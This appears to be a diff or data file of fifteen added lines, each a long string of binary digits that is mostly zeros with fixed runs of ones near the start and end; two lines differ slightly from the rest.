+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000110101000010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000001000110101101000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 